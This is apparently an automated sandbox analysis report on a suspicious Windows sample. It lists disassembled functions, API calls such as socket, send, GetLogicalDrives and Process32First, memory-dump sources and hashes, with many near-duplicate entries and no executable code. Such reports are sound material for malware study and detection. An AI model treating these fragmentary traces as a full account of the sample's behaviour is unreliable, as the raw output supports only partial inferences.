                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: ac0ae723a0e28ec211a8edcb61657e0260f105654384c93202991a5e9abc8968
                                                            • Instruction ID: fed42dc87dc4d55d6ab1a588a50f5710ae8546eccd5e57dd172e9ebb5cd35ff6
                                                            • Opcode Fuzzy Hash: ac0ae723a0e28ec211a8edcb61657e0260f105654384c93202991a5e9abc8968
                                                            • Instruction Fuzzy Hash: 3451B171604305ABE710DF24C891FAAB7A5FF84718F18C529FD4C9B282E731E991CBA1
                                                            Function 00D476A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1199 d476a0-d476be 1200 d476e6-d476f2 send 1199->1200 1201 d476c0-d476c7 1199->1201 1203 d476f4-d47709 call d472a0 1200->1203 1204 d4775e-d47762 1200->1204 1201->1200 1202 d476c9-d476d1 1201->1202 1205 d476d3-d476e4 1202->1205 1206 d4770b-d47759 call d472a0 call d4cb20 call 10c8c50 1202->1206 1203->1204 1205->1203 1206->1204
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,00D43D4E,00000000,?,?,00D507BF), ref: 00D476EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-3388739168
                                                            • Opcode ID: 672c02f76758a833833785ff54d755ba1b0c8e20855dbd88d1e2d4399447f9c1
                                                            • Instruction ID: 6cb1a1034708d408adedad1b0eebcfd17bd85345041b968c99636b8b2b0fcaa7
                                                            • Opcode Fuzzy Hash: 672c02f76758a833833785ff54d755ba1b0c8e20855dbd88d1e2d4399447f9c1
                                                            • Instruction Fuzzy Hash: 09112CF5A193047BE2209B259DC6D773F9CDBC2B68F49090CBC5567342D2619D0086F2
                                                            Function 00D475E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1337 d475e0-d475ed 1338 d47607-d47629 socket 1337->1338 1339 d475ef-d475f6 1337->1339 1341 d4763f-d47642 1338->1341 1342 d4762b-d4763c call d472a0 1338->1342 1339->1338 1340 d475f8-d475ff 1339->1340 1343 d47601-d47602 1340->1343 1344 d47643-d47699 call d472a0 call d4cb20 call 10c8c50 1340->1344 1342->1341 1343->1338
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: fd8b947e373db2f22f03f8eb4163af597f1137847b4fbcee2acaf276ef0c45aa
                                                            • Instruction ID: 6a856af3f8ef30b614fb6b4e16b547cd2156b48dfeb7c393108964d6aa50c416
                                                            • Opcode Fuzzy Hash: fd8b947e373db2f22f03f8eb4163af597f1137847b4fbcee2acaf276ef0c45aa
                                                            • Instruction Fuzzy Hash: 191148B6A1025137D7205B2DAC96F9B3F88EF82B74F490919F854A2292D3218C5483F1
                                                            Function 06E50093 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 454COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1459 6e50093-6e50094 1460 6e50095-6e50096 1459->1460 1461 6e50030-6e5008e call 6e5004a 1460->1461 1462 6e50098-6e500b5 1460->1462 1461->1459 1473 6e500a7-6e500b5 1461->1473 1464 6e500c5-6e50344 1462->1464 1496 6e50355-6e5036a GetLogicalDrives 1464->1496 1473->1464 1497 6e50379-6e50632 1496->1497
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 2040e1244db9cd70bdcfe749cd19f62dd361e79b1a4e4223df41db001ca7fbfb
                                                            • Instruction ID: 2b55084bc721722453cb6f2868606240fb7dcbc9f19b2f369505524e76a38ad0
                                                            • Opcode Fuzzy Hash: 2040e1244db9cd70bdcfe749cd19f62dd361e79b1a4e4223df41db001ca7fbfb
                                                            • Instruction Fuzzy Hash: F6916FEB24C321BD7382C4552F54AFB6B6DE5D6730332A827FC07D6542E2994E8E50B1
                                                            Function 06E50000 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 443COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1525 6e50000-6e50028 1528 6e50033-6e5008e call 6e5004a 1525->1528 1533 6e500a7-6e500b5 1528->1533 1534 6e50093-6e50096 1528->1534 1535 6e500c5-6e5036a GetLogicalDrives 1533->1535 1537 6e50030 1534->1537 1538 6e50098-6e500b5 1534->1538 1566 6e50379-6e50632 1535->1566 1537->1528 1538->1535
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 3a17a6ced6494aac53919e2855a3f7df64347897bd481ed45a7c29be781d9c28
                                                            • Instruction ID: eda464c9843622e6ad9668429f0c92f9247113528d25048cf6b853adcf210e16
                                                            • Opcode Fuzzy Hash: 3a17a6ced6494aac53919e2855a3f7df64347897bd481ed45a7c29be781d9c28
                                                            • Instruction Fuzzy Hash: 84817FEB14C321BD739284862F14EFB576DE5D6730732A827FC07D6542E2984E8E50B2
                                                            Function 06E5001E Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 443COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1594 6e5001e-6e50032 1595 6e50033-6e5008e call 6e5004a 1594->1595 1600 6e500a7-6e500b5 1595->1600 1601 6e50093-6e50096 1595->1601 1602 6e500c5-6e5036a GetLogicalDrives 1600->1602 1604 6e50030 1601->1604 1605 6e50098-6e500b5 1601->1605 1633 6e50379-6e50632 1602->1633 1604->1595 1605->1602
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 36a5959f5d89923e9b83d13b3acd6ebd02813661a8a6d67f80e1aa61c7be4e70
                                                            • Instruction ID: f888c5f323899d76d698f5981aad07b5bbcf6c7f5571bc21ffc4d390f09b32ab
                                                            • Opcode Fuzzy Hash: 36a5959f5d89923e9b83d13b3acd6ebd02813661a8a6d67f80e1aa61c7be4e70
                                                            • Instruction Fuzzy Hash: 0A816FEB14C321BD739285862F24EFB5B6DE5D67303329827FC07D6502E2994E8E51B2
                                                            Function 06E50014 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 442COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1661 6e50014-6e50028 1663 6e50033-6e5008e call 6e5004a 1661->1663 1668 6e500a7-6e500b5 1663->1668 1669 6e50093-6e50096 1663->1669 1670 6e500c5-6e5036a GetLogicalDrives 1668->1670 1672 6e50030 1669->1672 1673 6e50098-6e500b5 1669->1673 1701 6e50379-6e50632 1670->1701 1672->1663 1673->1670
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 5b73084879a1eb0cc444e2eb20d42c51e0fbca5f9cdbb57d0ed241d063747f5c
                                                            • Instruction ID: e80c5ba3e038a4981db7fe4dfe3f988ee7633b3de96827d03c5681634eca0693
                                                            • Opcode Fuzzy Hash: 5b73084879a1eb0cc444e2eb20d42c51e0fbca5f9cdbb57d0ed241d063747f5c
                                                            • Instruction Fuzzy Hash: 09817FEB14C321BD739284862F14EFB676DE5D6730732A827FC07D6542E2984E8E50B2
                                                            Function 06E90011 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 430COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 5b771063c7d6eb0c4b1c558c4cc0c1667048bfcd8737bfa31078656ee1d9aea4
                                                            • Instruction ID: c575b96bd548b4dd083766b2cefe1ebf3f6e9ad39e131b825fbd272f88dcaf07
                                                            • Opcode Fuzzy Hash: 5b771063c7d6eb0c4b1c558c4cc0c1667048bfcd8737bfa31078656ee1d9aea4
                                                            • Instruction Fuzzy Hash: 3791F6E714C320BDBBD284455B54AFB276EEFD77307B0942EF807C6642E2940A4A51F1
                                                            Function 06E5006B Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 430COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: c7ccddf01f62c038f9710198a19ce782f8653895eb41b4cd99f989297b19e9e9
                                                            • Instruction ID: c44671f6e6f20e7438b49fcdc1ed9497d04602ae1bd4861d9bef785797ad161a
                                                            • Opcode Fuzzy Hash: c7ccddf01f62c038f9710198a19ce782f8653895eb41b4cd99f989297b19e9e9
                                                            • Instruction Fuzzy Hash: 9E817FEB24C321BD738284512F64EFB6B6DE5D6730332A467FC07D6502E2994E8E51B2
                                                            Function 06E5004A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 425COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 2b25eaaf80ae468c09895df255cb9eae9b84416f436985cd3c926b6faad8029c
                                                            • Instruction ID: 7e1d635212b7603e226d43974703c50c19e40340d5c21535eba34c0b112bc041
                                                            • Opcode Fuzzy Hash: 2b25eaaf80ae468c09895df255cb9eae9b84416f436985cd3c926b6faad8029c
                                                            • Instruction Fuzzy Hash: FE814DEB24C321BD739285822F24EFB676DE5D6730332A427FC07D6502E2994E8E51B1
                                                            Function 06E500CD Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 424COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 3f23fe005a870632a9e0866bcdde2f7fb98baed7eedb802b3ae5a56b6a5ffbbf
                                                            • Instruction ID: eb97b6547ecd0023f8ae19a448b59b210947137643afc60ff763b43f11d6a45f
                                                            • Opcode Fuzzy Hash: 3f23fe005a870632a9e0866bcdde2f7fb98baed7eedb802b3ae5a56b6a5ffbbf
                                                            • Instruction Fuzzy Hash: BE816FEB24C321BD738284562F54EFB6B6DE5D6730332A827FC07D6502E2994E8E51B1
                                                            Function 06E9002A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 4251a6c4f9f939fce51a508a9d961daef242850070570653dab45e019c2d6be1
                                                            • Instruction ID: c068cbd9973478fdaefe69950e29e9ad1b04778731c0464bb8006ede067f0db8
                                                            • Opcode Fuzzy Hash: 4251a6c4f9f939fce51a508a9d961daef242850070570653dab45e019c2d6be1
                                                            • Instruction Fuzzy Hash: AA91F9E714C320BDBBD284456B54AFA276EEFD77307B0942EF807D6A42E3940A4A51F1
                                                            Function 06E5005C Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 420COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 525af8c2f1ce20058eb935238eb3e43db3a4f5715952a616553db750ba6268dd
                                                            • Instruction ID: d0251b7d6b6e6a62c2527ce87bb77eee47277235b380b029f4d603fb3613c209
                                                            • Opcode Fuzzy Hash: 525af8c2f1ce20058eb935238eb3e43db3a4f5715952a616553db750ba6268dd
                                                            • Instruction Fuzzy Hash: B4812CEB24D321BD739284822F64EFB576DE5D6730332A427FC07D6502E2994E8E51B2
                                                            Function 06E9004D Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 418COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 8876fc75001442332fcff68ff513e4583fc780a206f562bbf7cd61391f1bf7f0
                                                            • Instruction ID: 1375f08cbbf0f409c13528377bf3c745aaf8c0aea6f1ff083f36aab761d4e3fe
                                                            • Opcode Fuzzy Hash: 8876fc75001442332fcff68ff513e4583fc780a206f562bbf7cd61391f1bf7f0
                                                            • Instruction Fuzzy Hash: 5991E6E714C321BDBBC284455B54AFA2B6EEFD67307B0942EF807C6642E2944A4A51F1
                                                            Function 06E9003A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 417COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: f139c7b4869c0b3427bd1a6b159feb5fa955a55f049809f592aacb58914441f9
                                                            • Instruction ID: a02c7727d1f87ad0ebf81eab279390351b134f4262d3681631abb826f9e4f89c
                                                            • Opcode Fuzzy Hash: f139c7b4869c0b3427bd1a6b159feb5fa955a55f049809f592aacb58914441f9
                                                            • Instruction Fuzzy Hash: B491F7E714C321BDBBD284456B54AFA276EEFD77307B0A42EF807C6642E3940A4A51F1
                                                            Function 06E9006A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 9fe3194d1dbab768fbe68c064f9348ea1a14b717c027064bff2b7ae661a2ad42
                                                            • Instruction ID: 9a17730b5c2658252ebde86644ea46947f0f67e0dd8132b1a74de3487cb3871f
                                                            • Opcode Fuzzy Hash: 9fe3194d1dbab768fbe68c064f9348ea1a14b717c027064bff2b7ae661a2ad42
                                                            • Instruction Fuzzy Hash: B381F7E714C321BDBBD284456B54AFB276EEFD7730770942EF807C6A42E3940A4A51B1
                                                            Function 06E9007A Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 122e019585f0248613829bfa012488a8e9691b4918611046e0bbb42c25ec67c9
                                                            • Instruction ID: 2fbb47af6ec15d30cb4c2cc0f5eae764be0a222ac20beffb41cec0bd29a4ae8e
                                                            • Opcode Fuzzy Hash: 122e019585f0248613829bfa012488a8e9691b4918611046e0bbb42c25ec67c9
                                                            • Instruction Fuzzy Hash: BE81F9E714C321BDBBD284455B54AFB276EEFD77303B0942EF807D6A42E3940A4A51B1
                                                            Function 06E500BA Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 402COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 8b2fdb746eb1db69f33877fd548121f3beeb2520d77bc75849e055d73e5eba23
                                                            • Instruction ID: 910a9af16d0c04a74a3f92d14ce15c538318fe20c45e9f83abf252eb44870c6b
                                                            • Opcode Fuzzy Hash: 8b2fdb746eb1db69f33877fd548121f3beeb2520d77bc75849e055d73e5eba23
                                                            • Instruction Fuzzy Hash: 95712BEB24C321BD729285822F64EFB576DE5D6730332A427FC07D6502E2994E8E51B2
                                                            Function 06E900A1 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 398COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID: > km$]jl
                                                            • API String ID: 2623510744-3120149324
                                                            • Opcode ID: 8944898171967d7035dcdd834e5db4a8d8077eed7f4736fa293f7164c6bc72a6
                                                            • Instruction ID: 910cef62b8b628c58874a14c7cb650eff28367946f93dff3c13e347014b7b00c
                                                            • Opcode Fuzzy Hash: 8944898171967d7035dcdd834e5db4a8d8077eed7f4736fa293f7164c6bc72a6
                                                            • Instruction Fuzzy Hash: AA81F7E714C321BDBBC284456B54AFB276EEFD7730370942EF807C6A42E3940A4A51B1
                                                            Function 06E500E6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 387COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 349b78c2d4f6b02f4365c33ebb2b0ca99ea1ed969f8fd3a4c48d3d5b3fcb968d
                                                            • Instruction ID: efe68a25b284e2eb021faa73b680fbbd5a8255d9b77e426ee0daa9d99c2bbed4
                                                            • Opcode Fuzzy Hash: 349b78c2d4f6b02f4365c33ebb2b0ca99ea1ed969f8fd3a4c48d3d5b3fcb968d
                                                            • Instruction Fuzzy Hash: 7C713BEB24C221BD7392C5822F64EFB576DE5D67303329427FC07D6506E2984E8E51B2
                                                            Function 06E50109 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 09bf20d3590e512cf3a21a3b8257f8d558404497c0462dc32109ccea30a27839
                                                            • Instruction ID: d31d9e0c4c949f4c072a3cd7b855120af3c0b91d39fedcc226b3170d71c9f611
                                                            • Opcode Fuzzy Hash: 09bf20d3590e512cf3a21a3b8257f8d558404497c0462dc32109ccea30a27839
                                                            • Instruction Fuzzy Hash: 3C612AEB24C221BD729285822F24EFB576DE5D6730332E427FC07D6506E2994E8E51B2
                                                            Function 06E5011D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 372COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
